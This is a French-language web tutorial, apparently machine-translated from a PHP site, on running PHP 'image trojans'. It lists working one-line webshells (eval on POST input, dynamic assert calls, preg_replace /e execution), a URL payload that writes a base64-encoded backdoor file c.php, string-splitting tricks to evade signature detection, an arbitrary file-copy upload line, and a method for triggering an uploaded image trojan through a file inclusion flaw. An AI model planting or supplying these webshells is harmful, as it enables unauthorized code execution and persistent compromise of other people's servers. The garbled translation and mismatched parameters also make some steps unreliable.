Maison >développement back-end >Problème PHP >Comment exécuter un cheval de Troie d'image php
Comment exécuter un cheval de Troie d'image PHP
1 Méthode d'écriture standard, exécutez le code PHP directement via eval
@eval ($_POST['code']);
2. Exécutez dynamiquement assert pour générer un fichier cheval de Troie (le meilleur caché)
@$_GET['a']($_GET['code']);
3. dans les paramètres suivants et en cours d'exécution, un fichier c.php sera généré dans le répertoire courant
/index.php?a=assert&code=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29, base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};Lorsque le paramètre a est eval, une erreur sera signalée (car eval n'est pas un fonction). La génération du cheval de Troie échoue et elle est affirmée. La même erreur sera signalée, mais un cheval de Troie sera généré.
4. Utilisez preg_replace pour exécuter le code (utilisez simplement une chaîne arbitraire devant lui. Si elle est différente, la commande peut être exécutée plusieurs fois)
@preg_replace("/re/e", $_POST['code'], "re");
5. Rompre les signatures
session_start(); $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');
6 Renommez n'importe quel fichier
$reg="c"."o"."p"."y"; $reg($_FILES['filename']['tmp_name'],$_FILES['filename']['name']);
Comment utiliser la vulnérabilité d'inclusion.
Parfois, nous téléchargeons des chevaux de Troie d'images mais ils ne peuvent pas être exécutés pour le moment. S'il existe une vulnérabilité d'inclusion, les chevaux de Troie d'images peuvent être exécutés. S'il y a un include($_GET['controller']) dans le code php et qu'il y a un chemin url : /index.php?controller=user, cela semble être un contrôle correspondant exécuté basé sur inclusion des paramètres. Le code du serveur, mais si les paramètres dans le chemin de l'URL sont modifiés comme suit : /index.php?uid=/upload/images/muma.jpg, le cheval de Troie sera exécuté à ce moment-là. Le contenu ci-dessus est à titre de référence uniquement ! Tutoriel recommandé :Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!